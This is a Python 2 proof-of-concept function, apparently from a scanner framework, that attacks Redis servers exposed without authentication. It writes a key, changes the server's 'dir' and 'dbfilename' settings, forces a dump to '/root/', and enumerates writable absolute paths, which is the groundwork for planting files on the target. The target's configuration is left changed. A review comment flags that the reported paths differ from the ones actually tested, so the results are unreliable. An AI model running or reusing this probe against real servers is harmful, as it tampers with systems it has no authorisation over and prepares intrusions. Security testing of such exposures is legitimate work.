(url)
| 19 | |
| 20 | |
def poc(url):
    """Probe a Redis instance for unauthenticated, writable access.

    Steps, in the order the code performs them:
      1. Resolve *url* via host2IP and split it into ip and port
         (port falls back to 6379 when the resolved value has no ':').
      2. Look for a web service on 80/443/8080/8443; the first open port
         is used to build real_url and the loop stops. If none is open the
         function returns False (the for/else below).
      3. Connect to Redis with no credentials and call INFO; returns False
         unless the reply contains 'redis_version' or if any command raises.
      4. Write a throw-away key, set 'dir' to '/root/' and 'dbfilename' to
         'dump.rdb', delete the key and call r.save().
      5. Try each entry of ABSPATH_PREFIXES.LINUX (and each ABSPATH_SUFFIXES
         entry) as 'dir' and collect the ones the server accepted.

    Side effects on the target that this function does not undo: the
    server's 'dir' and 'dbfilename' are overwritten and are never read back
    (there is no config_get) nor restored, and r.save() writes a dump file
    into the configured directory. Only the temporary key is removed.

    All helpers (host2IP, checkPortTcp, redirectURL, randomString) and the
    ABSPATH_* tables are defined elsewhere in the project.

    Returns:
        False when no web port answers, when Redis is unreachable or does
        not accept unauthenticated commands, or when no path was accepted;
        otherwise a str of real_url followed by the accepted paths,
        separated by single spaces.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    # Default Redis port when host2IP returned no ':' separator.
    port = int(url.split(':')[-1]) if ':' in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # check for a web service
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                # Fall back to the bare host:port when redirect resolution fails.
                real_url = ip + ':' + str(web_port)
            break  # TODO simplified handling here: only the result for one port is returned
    else:
        # for/else: no break happened, i.e. none of the web ports was open.
        return False

    try:
        # r is reused after this block for the path enumeration below.
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if 'redis_version' not in r.info():  # check for unauthenticated access
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # check writable
        r.config_set('dir', '/root/')  # check write permission to /var/www (currently checks as root)
        r.config_set('dbfilename', 'dump.rdb')  # check operation permission
        r.delete(key)
        r.save()  # check that a save (export) is possible
    except Exception, e:
        # NOTE(review): Python 2-only except syntax; e is never used, so the
        # reason for the failure is discarded and every error maps to False.
        return False

    # enumerate absolute paths
    path_list = []
    for each in ABSPATH_PREFIXES.LINUX:
        try:
            r.config_set('dir', each.rstrip('/'))
            path_list.append(each)
            for suffix in ABSPATH_SUFFIXES:
                try:
                    # NOTE(review): 'dir' is set to suffix alone here, but the
                    # path recorded below is each + '/' + suffix, so the
                    # reported path is not the one that was actually tested —
                    # confirm which was intended.
                    r.config_set('dir', suffix.rstrip('/'))
                    path_list.append(each.rstrip('/') + '/' + suffix)
                except Exception:
                    continue
        except Exception:
            continue
    # The target's 'dir' is left at whichever value was accepted last.

    if len(path_list):
        return real_url + ' ' + ' '.join(path_list)
    else:
        return False